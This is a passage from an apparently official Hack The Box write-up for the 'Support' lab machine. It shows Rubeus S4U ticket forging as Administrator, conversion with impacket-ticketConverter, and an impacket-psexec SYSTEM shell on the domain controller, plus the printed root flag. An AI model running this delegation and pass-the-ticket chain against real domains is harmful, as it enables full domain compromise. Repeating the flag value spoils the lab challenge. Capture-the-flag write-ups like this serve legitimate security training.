| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: S4U
[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'support.htb\FAKE-COMP01$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFhDCCBYCgAwIBBaEDAgEWooIEmDCCBJRhggSQMIIEjKADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqAD
AgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBFIwggROoAMCARKhAwIBAqKCBEAEggQ86cqqh49u
Mu22ikyYsgaDti7sC57JyE06RHa3ArJA6OhaHEi5wjLER81ZoJcS5YcvgJyl4ZajPbr6iIpDRSr5zcnF
7pgMEZBmgQdWCEGzAJ5wTiPSlTdtPi/qydG8fpTKTm4ybYFaVmLSEEIcGwiyMoTNVgfnSXcmRUvD9dyk
lOwbme96MFHkzK4QSRivFMRgDBP6LhI1WW7L6dnqoTA6r0wzn42fyu9FQGr1wlsCqcUVDet/qivwmphL
k/wiSIyx4ZCvaWiQWlBiff0PfwSlwxHo7mNsr63Rw9smGKnsjKg68PT3x7XzfOQ+9Jk0LSrHt5Ffr+Ja
Yy+ukDa1k+yf7+fLih/yLhSLOkBrZeJRj+66sboOsxJ2a9PaE6Er9i0XzjykLu/04de1ooj0I01YqQ9p
89o2Ks8HkTddEB5QJZxHIjnwqRWp6GW+GaBlZGQlZwZbvc9j+Uv6tN89czzVxNsf0VNvo/It/PcKXZLf
fCTJ6cptjtmiXN+HXKcXVlRiNWwSKmIF3k0akLUmnnMSBivE1/kSdwSSuH1BNH/oJg+MODoTZNNOF2Bw
zBcyLPaXiNFgrTE2q/aTFxeHNskVzjzf5oslSTr8WpQost7WxG7UEf/5LuEvBhoV5fpcbLOygnjTDj86
Zj30uaOf3+SluHqdkxNoMK47j1WXrBOcQmm7Q2wYMoP23Jut0eH508w28T4+ir6ZNKohGfP3Oz05MmEj
JU/hE4osd05a/7ADRk9x40lYFQhpAQy1v0eEGxD/c0qFLgjyEM35OQEDY2toiN9V6tOwaKqTAulCZ9wk
EGig4XpC5Bk0obgppOpSfujTm6lT4hk3bR8RwqyoyoO2f9tS1R6Ztk/UOtNZJ9Awj5bt2wc8EV4VlM3e
4dY7Zbg3BzAUiA6sAYJVZgNvm2FD6fsFK1l37EaTZN61sd4dkPuSFoBX7URcxbW+VXBosii5LUMwMeU2
o81EkUfq+HTyLdC5uO/BjZVi5Z3b6uL8FKhPUjhRqbkt9ePvFFjh9dJnPPNCFnkN5axQ6xS7zaGzLLxa
z7hJhp9TU49/X+3MlrBdAylAGKgPZE2NT6g5xb8cBV9WYOPGRKhjG37CiGJZEQmvVBptqYy7of3rDxkp
OTf0MPGp2ribTps+rdWfmJwJ1LfTF3kgYPlnjARIjLuAaKMr04IDmXItRDf2+XkOIZv3phoi/XoUOq5V
QXkINfLPzre4w1XyRXlJ7sF6MTiouHuNgc3lhvMyPUu4TGQjNaowhPw60yLKipocmFJ/RSZYktm2XJRu
8De1mxpZzn6DBz8rUAEemi1wpGpyzkbnTvTr9n0Dg5YQNMyXbXjgCDVW+GXeij04Ohqb0I3dav4bwV6Z
yZ/BFXeJ5l3yBC3/xsakcyqP6DZFTtIG6ihTnDtHw1bfOBF3++RIUGbSYDMcPcs4nK6q3bpqCVcOfaOB
1zCB1KADAgEAooHMBIHJfYHGMIHDoIHAMIG9MIG6oBswGaADAgEXoRIEEPLiIPM8cR7SKDipWkxvHP+h
DRsLU1VQUE9SVC5IVEKiGTAXoAMCAQGhEDAOGwxGQUtFLUNPTVAwMSSjBwMFAEDhAAClERgPMjAyNDEy
MTEwODI1MzVaphEYDzIwMjQxMjExMTgyNTM1WqcRGA8yMDI0MTIxODA4MjUzNVqoDRsLU1VQUE9SVC5I
VEKpIDAeoAMCAQKhFzAVGwZrcmJ0Z3QbC3N1cHBvcnQuaHRi
[*] Action: S4U
[*] Building S4U2self request for: 'FAKE-COMP01$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'FAKE-COMP01$@SUPPORT.HTB'
[*] base64(ticket.kirbi):
doIFrDCCBaigAwIBBaEDAgEWooIExjCCBMJhggS+MIIEuqADAgEFoQ0bC1NVUFBPUlQuSFRCohkwF6AD
AgEBoRAwDhsMRkFLRS1DT01QMDEko4IEhzCCBIOgAwIBF6EDAgEBooIEdQSCBHFpW8+TLddgGtlOlPKA
JVuCHeO9lHrtCLxBiIpMubdPaj6r89MquI79TagtZtbC6GT7w/dnese7je8HZ1PYTCt4C5ZV2LceC2Sk
wDtZCQqodrelkTCjjceBZCUfCPsGTQdKFzTZS8qa9rvt/MNcp+/7GvItBmHPr2QC5N5eRelwF22ln14N
qxjPzAA308eOCNyxts0A9x6J24BO3hlkD6Q+YNUOwVRYeg5x59d+Qd6UM7kpx57LU3W/+1p1Mo2IxLdK
cp0J4aJgsShaHlRfjNnAAWoBAvBx0MlHBy/eC0U2oo6nZoZZ2ft3ya/mWgaW4sh1iJpxoYUNtP/9xhj/
6hypzt0NQf7hSxT22XFG4DMMM3vxHdDbEfBLeQSb62DmCjzGnF1mgQzRoW2iMOyaUhslh1v74rLK7pfP
Eh1ShBsVW82gH8pgV1/nxIYUGy8o5+C4Xh+dZ2kHKuoUUU7bCa3tYQrlEIP2qNIEOu0MelR0sV6WIJ7d
439gp/kroZNnsJ/Bc6Pe18h52Pd75WtvVVew/LCZFOBznqo/zuBC05cWSVIvMzlG1gpgD/ukP/dOzbri
CO8Vu19j2eBUb8eBSe5/SUY9lx/j573qZugNTtdbJv5OdzjWa2N7+Ra6Ha1UqHOa/pKGC+QEarpFWfPQ
deik+Fga+WXZ1Oox4yiTQp4DylDzS9Kzsji5taEboYhMLCCsqmHpOycJP4DHoYA4JOoAPo6Hd6524SZw
W5/qi7fUL1a41VFACrNmrzwyDRKRrVTXwpXQpjvhj1bOQpQBWF4uYfRJzdjSk1jPopY6eC8uJw23yaDd
cR4jp57QPUW3HZm/dkxkXZRqpX2Tvut8ado/CpHTwEX5cg5J4WnEpCZQWZ3ZarbMfWTAGTq7ghxE2Xd2
H8RCU7zi46+XQyX/zJo9SCaV3E1221dMUEuAlIxrnpZ8BUNAsF0bblUd4aYeJcORn2UoSbM+0Ed+vEth
Vwtxz4MrZcnLI1I98lfGFd+SlK1bUSnfbMuP06fB62P7assqsOYx6jNu/A1LJEYbQ/DkvDsFuOHNOEAe
Tq9FMcSwwvfTNW913FP0s/Q7vU9xNAByyePx8IPb3T+JQIl/sGDUUgXCx4GN4qYHzjq8y6rIMLdHmIBl
MJ+OMw1hyF61Q7uMZR43tQFC+YxUij3qOpWU0RwaaTC3LYcWn/OYPT0TDCJkDJb5YpyP8ao2XMSUbIlG
GB5Bs7qvCaDPsGWjizmju513OG3y/hVNQS9fg0h0NSciuewqtWuRsH4EvA2IMlMx5SI6KYRlTCkuvgrM
7IKT15A1AVKLZeHy5VcoF31bR1f0yZiq4JO6jZnSxK26QYhVZYUASrVDVDXdW5O1f5MxiOGQS8fObxj9
cflXQ7uK4UYvxXToVWGzubOWLxJ2WXM2cdhzDSh9ZSLz2IdcJ/4x1byAjxR8RF1wPmX6vNCQN3fU5ucD
NCTX0DFS0X4xOyGyDh2Dq0WVq5tfwet1PNrpAt07O3cDzgGVuyoYbceqOEyjgdEwgc6gAwIBAKKBxgSB
w32BwDCBvaCBujCBtzCBtKAbMBmgAwIBF6ESBBBb/2K8xSeJcpcTOhh2YmjNoQ0bC1NVUFBPUlQuSFRC
ohowGKADAgEKoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKEAAKURGA8yMDI0MTIxMTA4MjUzNVqmERgP
MjAyNDEyMTExODI1MzVapxEYDzIwMjQxMjE4MDgyNTM1WqgNGwtTVVBQT1JULkhUQqkZMBegAwIBAaEQ
MA4bDEZBS0UtQ09NUDAxJA==
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':
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
MBYbBGNpZnMbDmRjLnN1cHBvcnQuaHRi
[+] Ticket successfully imported!
Rubeus successfully generated the Kerberos tickets. To proceed, we can take the last Base64-encoded ticket and use it on our local machine to gain a shell on the domain controller as Administrator.
Here are the steps:
- Copy the value of the last ticket.
- Paste it into a file named
ticket.kirbi.b64
. - Note: Before saving the file, ensure that all whitespace characters are removed from the ticket value.
Next, create a new file named ticket.kirbi
by decoding the Base64 value of the previous ticket.
base64 -d ticket.kirbi.b64 > ticket.kirbi
Finally, we need to convert the .kirbi
ticket into a format compatible with Impacket. This can be done using Impacket's TicketConverter.py
.
└─$ impacket-ticketConverter ticket.kirbi ticket.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
To obtain a shell, you can use Impacket's psexec.py
tool with the converted Kerberos ticket.
└─$ KRB5CCNAME=ticket.ccache impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file sugVzfTC.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service yQLQ on dc.support.htb.....
[*] Starting service yQLQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
A shell as NT AUTHORITY\SYSTEM
has been successfully obtained. The root flag can now be retrieved from the C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 955A-5CBB
Directory of C:\Users\Administrator\Desktop
05/28/2022 03:17 AM <DIR> .
05/28/2022 03:11 AM <DIR> ..
12/10/2024 06:29 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,961,053,184 bytes free
C:\Users\Administrator\Desktop> type root.txt
d8aa8d65b3aa44620299a0687232f98a
C:\Users\Administrator\Desktop> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : dc
Primary Dns Suffix . . . . . . . : support.htb
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : support.htb
.htb
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-C7-57
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 10.129.233.185(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Lease Obtained. . . . . . . . . . : Tuesday, December 10, 2024 6:28:24 PM
Lease Expires . . . . . . . . . . : Wednesday, December 11, 2024 1:28:23 AM
Default Gateway . . . . . . . . . : 10.10.10.2
10.129.0.1
DHCP Server . . . . . . . . . . . : 10.129.0.1
DNS Servers . . . . . . . . . . . : 127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
References
Hack The Box Official Writeup for Support